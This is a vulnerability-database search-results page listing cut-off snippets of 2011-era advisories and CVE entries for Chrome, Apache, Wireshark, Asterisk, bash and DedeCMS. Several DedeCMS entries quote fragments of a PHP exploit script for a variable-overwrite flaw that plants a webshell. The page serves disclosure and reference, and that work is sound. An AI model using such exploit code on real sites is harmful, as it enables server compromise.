9563 matches found
Google Chrome < 15.0.874.120 Multiple Vulnerabilities
The version of Google Chrome installed on the remote host is earlier than 15.0.874.120. It is, therefore, potentially affected by the following vulnerabilities : - A double-free error exists in the Theora decoder. CVE-2011-3892 - Out-of-bounds read errors exist in the MVK and Vorbis media handler...
CVE-2011-4415
The appregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the modsetenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service memory consumption or NULL...
[PT-2011-20] Authorization bypass vulnerability in OneOrZero AIMS
---------------------------------------------------------------------- PT-2011-20 Positive Technologies Security Advisory Authorization bypass vulnerability in OneOrZero AIMS ---------------------------------------------------------------------- ---Vulnerable software OneOrZero AIMS Version: 2.7....
DEBIAN-CVE-2011-4100
The csnStreamDissector function in epan/dissectors/packet-csn1.c in the CSN.1 dissector in Wireshark 1.6.x before 1.6.3 does not initialize a certain variable, which allows remote attackers to cause a denial of service application crash via a malformed packet...
Sql injection
SQL injection vulnerability in lib/oozaccess.php in OneOrZero Action & Information Management System AIMS 2.7.0 allows remote attackers to execute arbitrary SQL commands via the cookieName variable...
Dede GetWebShell 0Day vulnerability analysis report-vulnerability warning-the black bar safety net
Recently a lot of websites is the explosion compromised, after a security Bao-wide laboratory research and analysis of these sites using DedeCMS CMS, DedeCMS broke a very serious vulnerability, an attacker can direct the server to write“word Trojan”in. DedeCMS vulnerability causes is mainly due t...
CVE-2011-3628
Untrusted search path vulnerability in pammotd aka the MOTD module in libpam-modules before 1.1.3-2ubuntu2.1 on Ubuntu 11.10, before 1.1.2-2ubuntu8.4 on Ubuntu 11.04, before 1.1.1-4ubuntu2.4 on Ubuntu 10.10, before 1.1.1-2ubuntu5.4 on Ubuntu 10.04 LTS, and before 0.99.7.1-5ubuntu6.5 on Ubuntu 8.0...
AST-2011-012: Remote crash vulnerability in SIP channel driver
Asterisk Project Security Advisory - AST-2011-012 Product Asterisk Summary Remote crash vulnerability in SIP channel driver Nature of Advisory Remote crash Susceptibility Remote authenticated sessions Severity Critical Exploits Known No Reported On October 4, 2011 Reported By Ehsan Foroughi Poste...
Dedecms variable coverage vulnerability Exploit-vulnerability warning-the black bar safety net
Title: Dedecms variable coverage vulnerability Exploit Time: 2011-09-06 Team:MakeBug Author: cfKing / |/ | / | | | / / | | | | | | | / | / / / /| /| | / /| | | |/ / | | | || | | | | | | | | | / / |/ | | / / | | | | | | | | | | | | | \ / / | | / / | | | | | | | || | | || | | || | | | // || // || |...
CVE-2009-5103
Cross-site scripting XSS vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...
Cross site scripting
Cross-site scripting XSS vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...
CVE-2009-5103
Cross-site scripting XSS vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...
DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net
Affected versions: DEDECMS full version The vulnerability described in: DEDECMS background landing template gotopage variable is not tested incoming data, leading toXSSvulnerabilities. \dede\templets\login.htm 6 5 the left and right input type="hidden" name="gotopage" value="? php if!...
asterisk -- remote crash vulnerability in SIP channel driver
Asterisk project reports: A remote authenticated user can cause a crash with a malformed request due to an unitialized variable...
Code injection
Array index error in GroupWise Internet Agent GWIA in Novell GroupWise 8.0 before HP3 allows remote attackers to execute arbitrary code via a crafted yearly RRULE variable in a VCALENDAR attachment in an e-mail message...
Wireshark Multiple Denial of Service Vulnerabilities - Windows
Wireshark is prone to multiple denial of service vulnerabilities. SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...
DeDeCMS(weaving dreams)variable overwrite 0day getshell-a vulnerability warning-the black bar safety net
! usr/bin/php-w ? php errorreportingEERROR; settimelimit0; printr' DEDEcms Variable Coverage Exploit Author: www.heixiaozi.com www.webvul.com ; echo "\r\n"; if$argv2==null printr' +---------------------------------------------------------------------------+ Usage: php '.$ argv0.' url aid path aid...
DeDeCMS(织梦) 变量覆盖(CVE-2015-4553)
简要描述: 1.受影响版本DEDECMS 5.7、5.6、5.5。 2.漏洞文件/include/common.inc.php 3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。 漏洞危害: 1.黑客可以通过此漏洞来重定义数据库连接。 2.通过此漏洞进行各种越权操作构造漏洞直接写入webshell后门。 !usr/bin/php -w 12 echo " Exploit Success \n"; if$aid==1echo " Shell:".$url."/$path/data/cache/fuck.php\n" ; if$aid==2echo "...
CentOS 5 : bash (CESA-2011:1073)
An updated bash package that fixes one security issue, several bugs, and adds one enhancement is now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having low security impact. A Common Vulnerability Scoring System CVSS base score, which gives...
CentOS Update for bash CESA-2011:1073 centos5 i386
Check for the Version of bash OpenVAS Vulnerability Test CentOS Update for bash CESA-2011:1073 centos5 i386 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under t...